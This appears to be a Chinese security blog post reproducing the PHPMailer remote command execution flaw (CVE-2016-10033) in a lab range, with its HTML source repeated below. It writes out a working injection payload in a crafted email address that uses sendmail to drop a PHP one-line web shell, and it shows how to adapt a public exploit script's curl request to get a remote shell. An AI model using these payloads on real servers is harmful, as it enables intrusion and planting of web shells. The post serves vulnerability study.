PHPMailer远程命令执行漏洞复现

博主： admin
发布时间：2020 年 04 月 07 日
1337 次浏览
暂无评论
1140字数
分类：安全技术

0x01 漏洞原理

知识点梳理，靶场复现

漏洞编号：CVE-2016-10033

影响范围：PHPMailer版本<5.2.18

PHPMailer中的mail函数在发送邮件时使用了系统sendmail方法，由于没有足够过滤使得用户可以注入攻击代码

PHPMailer命令执行漏洞（CVE-2016-10033）利用escapeshellarg和escapeshellcmd两个函数结合使用，导致了单引号逃逸。具体的漏洞分析和利用过程可以通过合天网安的这个实验进行，但是要价200和氏币：

0x02 靶场复现

先用墨者靶场复现

打开页面是一个英文网站，拉到底部有个邮件链接：

点进去，是个邮件发送界面；

Exp：

构造邮箱

"attacker\" -oQ/tmp -X/var/www/html/shell.php soapffz"@gmail.com

消息：

<?php @eval($_POST[a]);?>

sendmail -X参数可以将日志写入指定文件，发送后页面卡住了，但是不要紧，其实一句话木马已经写入了

上蚁剑连接：

拿到key

0x03 rce-exp

exp地址，下载后，测试远程目标运行如下命令：

./exploit host:port

本地测试如下：

./exploit localhost:8080

默认的exp只给两个参数host和port，本题里面还有目录mail.php，简单修改即可：

只需把

curl -sq 'http://'$host -H 'Content-Type:

中添加你对应的目录即可：

curl -sq 'http://'$host/mail.php -H 'Content-Type:

成功获取到远程shell，权限是www-data用户

0x04 尝试提权

还没。。

本文完。

参考文章：

正文到此结束

本文作者：soapffz
本文链接：https://soapffz.com/archives/557/
版权声明：本博客所有文章除特别声明外，均默认采用 CC BY-NC-SA 4.0 许可协议。

最后修改：2020 年 04 月 07 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

522
浏览次数: 20627
树莓派4B装Kali(2020.01.16更新)
浏览次数: 4699
ATT&CK实战-红日安全vulnstack(一)
浏览次数: 4101
SSRF 学习之 ctfhub靶场-FastCGI
浏览次数: 3286
搭建本地ip代理池(完结)
浏览次数: 2936

北落师门
大佬，你这个音乐播放器的背景色是怎么自适应夜间模式的，我的播放...
不知名的人士
使用open('1.txt','rb') 可以直接对元数据进行...
Gilbert
要是靶机开了防火墙或者杀软，有啥办法绕过吗？
back
请问您提到的iOS App network，全称是啥？谢谢！
wxx
哈哈，网站首页就有admin；123456登录后台了，我看到那...

PHPMailer远程命令执行漏洞复现

admin • 2020 年 04 月 07 日

<h2>0x01 漏洞原理</h2><p>知识点梳理，靶场复现</p><p>漏洞编号：CVE-2016-10033</p><p>影响范围：PHPMailer版本&lt;5.2.18</p><blockquote>PHPMailer中的mail函数在发送邮件时使用了系统sendmail方法，由于没有足够过滤使得用户可以注入攻击代码</blockquote><p><code>PHPMailer</code>命令执行漏洞（CVE-2016-10033）利用<code>escapeshellarg</code>和<code>escapeshellcmd</code>两个函数结合使用，导致了单引号逃逸。具体的漏洞分析和利用过程可以通过合天网安的<span class="external-link"><a class="no-external-link" href="http://www.hetianlab.com/expc.do?ec=ECID2117-c828-49a4-89bf-b5f362976166" target="_blank"><i data-feather="external-link"></i>这个实验</a></span>进行，但是要价200和氏币：</p><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_152553.png#mirages-width=1023&mirages-height=290&mirages-cdn-type=1" alt="" title=""style=""></p><h2>0x02 靶场复现</h2><p>先用<span class="external-link"><a class="no-external-link" href="https://www.mozhe.cn/bug/detail/124" target="_blank"><i data-feather="external-link"></i>墨者靶场</a></span>复现</p><p>打开页面是一个英文网站，拉到底部有个邮件链接：</p><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_102314.png#mirages-width=1366&mirages-height=570&mirages-cdn-type=1" alt="" title=""style=""></p><p>点进去，是个邮件发送界面；</p><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_102346.png#mirages-width=479&mirages-height=389&mirages-cdn-type=1" alt="" title=""style=""></p><p>Exp：</p><p>构造邮箱</p><pre><code>&quot;attacker\&quot; -oQ/tmp -X/var/www/html/shell.php soapffz&quot;@gmail.com</code></pre><p>消息：</p><pre><code>&lt;?php @eval($_POST[a]);?&gt;</code></pre><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_102900.png#mirages-width=467&mirages-height=382&mirages-cdn-type=1" alt="" title=""style=""></p><p><code>sendmail -X</code>参数可以将日志写入指定文件，发送后页面卡住了，但是不要紧，其实一句话木马已经写入了</p><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_103007.png#mirages-width=963&mirages-height=298&mirages-cdn-type=1" alt="" title=""style=""></p><p>上蚁剑连接：</p><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_103151.png#mirages-width=694&mirages-height=202&mirages-cdn-type=1" alt="" title=""style=""></p><p>拿到<code>key</code></p><h2>0x03 rce-exp</h2><p><code>exp</code><span class="external-link"><a class="no-external-link" href="https://www.exploit-db.com/exploits/40968" target="_blank"><i data-feather="external-link"></i>地址</a></span>，下载后，测试远程目标运行如下命令：</p><pre><code>./exploit host:port</code></pre><p>本地测试如下：</p><pre><code>./exploit localhost:8080</code></pre><p>默认的<code>exp</code>只给两个参数<code>host</code>和<code>port</code>，本题里面还有目录<code>mail.php</code>，简单修改即可：</p><p>只需把</p><pre><code>curl -sq 'http://'$host -H 'Content-Type:</code></pre><p>中添加你对应的目录即可：</p><pre><code>curl -sq 'http://'$host/mail.php -H 'Content-Type:</code></pre><p><img src="https://img.soapffz.com/archives_img/2020/04/07/archives_20200407_154542.png#mirages-width=824&mirages-height=383&mirages-cdn-type=1" alt="" title=""style=""></p><p>成功获取到远程<code>shell</code>，权限是<code>www-data</code>用户</p><h2>0x04 尝试提权</h2><p>还没。。</p><p>本文完。</p><p>参考文章：</p><ul><li><span class="external-link"><a class="no-external-link" href="https://paper.seebug.org/164/" target="_blank"><i data-feather="external-link"></i>PHP escapeshellarg()+escapeshellcmd() 之殇</a></span></li><li><span class="external-link"><a class="no-external-link" href="http://vulapps.evalbug.com/p_phpmailer_1/" target="_blank"><i data-feather="external-link"></i>PHPMailer &lt; 5.2.18 远程命令执行漏洞环境 (CVE-2016-10033)</a></span></li><li><span class="external-link"><a class="no-external-link" href="http://vulapps.evalbug.com/w_wordpress_6/" target="_blank"><i data-feather="external-link"></i>WordPress &lt;= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)</a></span></li></ul>